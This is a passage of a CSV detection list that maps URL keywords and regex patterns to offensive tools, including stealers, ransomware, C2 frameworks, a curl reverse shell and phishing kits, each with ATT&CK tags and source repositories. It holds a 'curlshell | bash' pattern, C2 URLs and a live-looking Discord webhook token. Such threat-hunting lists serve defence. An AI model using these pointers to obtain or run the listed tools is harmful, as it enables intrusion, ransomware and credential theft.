Every snippet is obfuscated at runtime/request so that no generated output shares the same signatures.","T1059.001 - T1562.001 - T1027.005","TA0002 - TA0005 - TA0008","N/A","N/A","Defense Evasion","https://amsi.fail/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","47652" "*https://api.fbi.gov/wanted/v1/list*",".{0,1000}https\:\/\/api\.fbi\.gov\/wanted\/v1\/list.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","1","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","47658" "*https://api.github.com/orgs/gatoxtest/*",".{0,1000}https\:\/\/api\.github\.com\/orgs\/gatoxtest\/.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","1","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","47661" "*https://api.localxpose.io/api/v2/downloads/loclx-darwin-amd64.zip*",".{0,1000}https\:\/\/api\.localxpose\.io\/api\/v2\/downloads\/loclx\-darwin\-amd64\.zip.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens a link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","#linux","N/A","10","","N/A","","","","47663" "*https://api.onedrive.com/v1.0/drives/me/items/root:{onedrive_file_path}:/oneDrive.createUploadSession*",".{0,1000}https\:\/\/api\.onedrive\.com\/v1\.0\/drives\/me\/items\/root\:\{onedrive_file_path\}\:\/oneDrive\.createUploadSession.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","47665" "*https://api.sublist3r.com/search.php?domain=",".{0,1000}https\:\/\/api\.sublist3r\.com\/search\.php\?domain\=","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. 
The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/aboul3la/Sublist3r","1","1","N/A","N/A","5","10","10300","2148","2024-08-02T00:00:30Z","2015-12-15T00:55:25Z","47667" "*https://auth.pico.sh/*",".{0,1000}https\:\/\/auth\.pico\.sh\/.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","47680" "*https://avred.r00ted.ch/upload*",".{0,1000}https\:\/\/avred\.r00ted\.ch\/upload.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","47681" "*https://badkeys.info/*",".{0,1000}https\:\/\/badkeys\.info\/.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","1","N/A","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","47682" "*https://best-wishes-to-you*",".{0,1000}https\:\/\/best\-wishes\-to\-you.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","47685" "*https://bin.ajam.dev//$(uname -m)/bash*",".{0,1000}https\:\/\/bin\.ajam\.dev\/\/\$\(uname\s\-m\)\/bash.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","#linux","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","47686" "*https://bin.equinox.io/c/4VmDzA7iaHb/*",".{0,1000}https\:\/\/bin\.equinox\.io\/c\/4VmDzA7iaHb\/.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","1","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","47687" "*https://bitbucket.org/evilgreyswork/*",".{0,1000}https\:\/\/bitbucket\.org\/evilgreyswork\/.{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","Dispossessor","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","1","N/A","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A","47695" "*https://blog.sevagas.com/?Advanced-MacroPack-payloads-XLM-Injection*",".{0,1000}https\:\/\/blog\.sevagas\.com\/\?Advanced\-MacroPack\-payloads\-XLM\-Injection.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like 
format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","47696" "*https://blog.sevagas.com/?Bypass-Windows-Defender-Attack-Surface-Reduction*",".{0,1000}https\:\/\/blog\.sevagas\.com\/\?Bypass\-Windows\-Defender\-Attack\-Surface\-Reduction.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","47697" "*https://blog.sevagas.com/?EXCEL-4-0-XLM-macro-in-MacroPack-Pro*",".{0,1000}https\:\/\/blog\.sevagas\.com\/\?EXCEL\-4\-0\-XLM\-macro\-in\-MacroPack\-Pro.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","47698" "*https://blog.sevagas.com/?Launch-shellcodes-and-bypass-Antivirus-using-MacroPack-Pro-VBA-payloads*",".{0,1000}https\:\/\/blog\.sevagas\.com\/\?Launch\-shellcodes\-and\-bypass\-Antivirus\-using\-MacroPack\-Pro\-VBA\-payloads.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","47699" "*https://bloodhound.readthedocs.io/en/latest/index.html*",".{0,1000}https\:\/\/bloodhound\.readthedocs\.io\/en\/latest\/index\.html.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","47700" "*https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation*",".{0,1000}https\:\/\/book\.hacktricks\.xyz\/windows\-hardening\/windows\-local\-privilege\-escalation.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","47701" "*https://browserling.com/tor-testing*",".{0,1000}https\:\/\/browserling\.com\/tor\-testing.{0,1000}","offensive_tool_keyword","browserling","proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","browserling.com","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","47704" "*https://bruteratel.com:65000/activate*",".{0,1000}https\:\/\/bruteratel\.com\:65000\/activate.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY 
BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","47705" "*https://C2_SERVER_IP/*",".{0,1000}https\:\/\/C2_SERVER_IP\/.{0,1000}","offensive_tool_keyword","ServerlessRedirector","Serverless Redirector in various cloud vendor for red team","T1090.003 - T1095 - T1001.003","TA0010 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/KINGSABRI/ServerlessRedirector","1","0","#content","N/A","10","1","72","10","2022-12-08T08:56:02Z","2022-12-08T07:52:49Z","47708" "*https://cdn.discordapp.com/attachments/976805447266877471/987826721250238464/c33cd7baf5e2abdf434c2793988ccb56.png*",".{0,1000}https\:\/\/cdn\.discordapp\.com\/attachments\/976805447266877471\/987826721250238464\/c33cd7baf5e2abdf434c2793988ccb56\.png.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","N/A","10","","N/A","","","","47710" "*https://cmd5.la/*",".{0,1000}https\:\/\/cmd5\.la\/.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47713" "*https://cnc.mkbot.info/alertmsg.zip*",".{0,1000}https\:\/\/cnc\.mkbot\.info\/alertmsg\.zip.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for 
simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","47714" "*https://cnc.mkbot.info/handshake.php*",".{0,1000}https\:\/\/cnc\.mkbot\.info\/handshake\.php.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","47715" "*https://code.google.com/p/creddump/*",".{0,1000}https\:\/\/code\.google\.com\/p\/creddump\/.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","47716" "*https://code.kryo.se/iodine/iodine-*",".{0,1000}https\:\/\/code\.kryo\.se\/iodine\/iodine\-.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","47717" "*https://codeberg.org/RipperSec/MegaMedusa*",".{0,1000}https\:\/\/codeberg\.org\/RipperSec\/MegaMedusa.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","47718" "*https://crack.sh/get-cracking/*",".{0,1000}https\:\/\/crack\.sh\/get\-cracking\/.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","1","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","47720" "*https://cracker.okx.ch*",".{0,1000}https\:\/\/cracker\.okx\.ch.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47721" "*https://crackstation.net/*",".{0,1000}https\:\/\/crackstation\.net\/.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Credential Access","https://github.com/LasCC/Hack-Tools","1","1","N/A","N/A","9","10","6045","678","2025-01-05T23:10:49Z","2020-06-22T21:42:16Z","47722" "*https://curlshell:*",".{0,1000}https\:\/\/curlshell\:.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - 
TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","#linux","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","47725" "*https://curlshell:* | bash",".{0,1000}https\:\/\/curlshell\:.{0,1000}\s\|\sbash","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","#linux","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","47726" "*https://cutt.ly/syFzILH*",".{0,1000}https\:\/\/cutt\.ly\/syFzILH.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","47727" "*https://cyseclabs.com/exploits/*",".{0,1000}https\:\/\/cyseclabs\.com\/exploits\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","47728" "*https://default-password.info/*",".{0,1000}https\:\/\/default\-password\.info\/.{0,1000}","offensive_tool_keyword","default-password.info","default passwords database","T1110 - T1082","TA0006 - TA0001","N/A","N/A","Credential Access","https://default-password.info/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","47729" "*https://dehash.me*",".{0,1000}https\:\/\/dehash\.me.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential 
Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47730" "*https://dev.tuns.sh*",".{0,1000}https\:\/\/dev\.tuns\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","47731" "*https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/*",".{0,1000}https\:\/\/dirkjanm\.io\/abusing\-azure\-ad\-sso\-with\-the\-primary\-refresh\-token\/.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","1","N/A","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","47732" "*https://discord.com/api/webhooks/1172456340560560180/KwaMHIPwjfbQIhVUB-mOHNRiHoNnyAzzQcvgvjJHqGAfLSXahTDKwB1SVuq__NVlPbeQ*",".{0,1000}https\:\/\/discord\.com\/api\/webhooks\/1172456340560560180\/KwaMHIPwjfbQIhVUB\-mOHNRiHoNnyAzzQcvgvjJHqGAfLSXahTDKwB1SVuq__NVlPbeQ.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","1","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","47733" "*https://discord.com/invite/5Hpj4Gs5SS*",".{0,1000}https\:\/\/discord\.com\/invite\/5Hpj4Gs5SS.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the 
#Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","1","N/A","AD Enumeration","7","10","1290","131","2025-03-12T10:53:09Z","2023-09-26T12:36:59Z","47734" "*https://dns.blokada.org/dns-query*",".{0,1000}https\:\/\/dns\.blokada\.org\/dns\-query.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","47735" "*https://dns10.quad9.net:5053/dns-query*",".{0,1000}https\:\/\/dns10\.quad9\.net\:5053\/dns\-query.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","47736" "*https://dnsdumpster.com/*",".{0,1000}https\:\/\/dnsdumpster\.com\/.{0,1000}","offensive_tool_keyword","dnsdumpster","dns recon & research - find & lookup dns records","T1018 - T1596.001 - T1590.002","TA0007 - TA0043","N/A","Dispossessor","Reconnaissance","https://dnsdumpster.com/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","47737" "*https://docs.ssi.sh/*",".{0,1000}https\:\/\/docs\.ssi\.sh\/.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","47739" "*https://downloads.hak5.org/cloudc2*",".{0,1000}https\:\/\/downloads\.hak5\.org\/cloudc2.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","47741" "*https://drive.google.com/file/d/1WLJGs3ZUypf6hLh5WL4AJmsKdUOZo5yZ*",".{0,1000}https\:\/\/drive\.google\.com\/file\/d\/1WLJGs3ZUypf6hLh5WL4AJmsKdUOZo5yZ.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","47747" "*https://drive.usercontent.google.com/download?id=1Up7tr9Zh2e7FVLOdx5J1We3GJLGxEAMO&export=download*",".{0,1000}https\:\/\/drive\.usercontent\.google\.com\/download\?id\=1Up7tr9Zh2e7FVLOdx5J1We3GJLGxEAMO\&export\=download.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","47748" "*https://emkei.cz/*",".{0,1000}https\:\/\/emkei\.cz\/.{0,1000}","offensive_tool_keyword","emkei.cz","Free online fake mailer with attachments","T1071","TA0005","N/A","N/A","Defense Evasion","https://emkei.cz/","1","1","N/A","N/A","6","8","N/A","N/A","N/A","N/A","47754" 
"*https://en.hackndo.com/remote-lsass-dump-passwords/*",".{0,1000}https\:\/\/en\.hackndo\.com\/remote\-lsass\-dump\-passwords\/.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","47755" "*https://erwan2212.github.io/NTHASH-FPC*",".{0,1000}https\:\/\/erwan2212\.github\.io\/NTHASH\-FPC.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","47756" "*https://ffuf.io.fi*",".{0,1000}https\:\/\/ffuf\.io\.fi.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","47759" "*https://ffuf.io/FUZZ*",".{0,1000}https\:\/\/ffuf\.io\/FUZZ.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","47760" "*https://forum.exploit.in/topic/*",".{0,1000}https\:\/\/forum\.exploit\.in\/topic\/.{0,1000}","offensive_tool_keyword","forum.exploit.in","a well-known cybercriminal forum where threat actors discuss exploits","T1583.001 - T1583.002 - T1583.006 - T1595.002 - T1596 - T1586 - T1071.001","TA0042 - TA0001 - TA0009","N/A","Black Basta","Exploitation 
tool","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","47766" "*https://free-399rs-jio-recharge*",".{0,1000}https\:\/\/free\-399rs\-jio\-recharge.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","47767" "*https://github.com/bitsadmin/*",".{0,1000}https\:\/\/github\.com\/bitsadmin\/.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","47770" "*https://github.com/curl/curl/wiki/DNS-over-HTTPS*",".{0,1000}https\:\/\/github\.com\/curl\/curl\/wiki\/DNS\-over\-HTTPS.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","47771" "*https://github.com/dekrypted/*",".{0,1000}https\:\/\/github\.com\/dekrypted\/.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","github user host multiple stealers 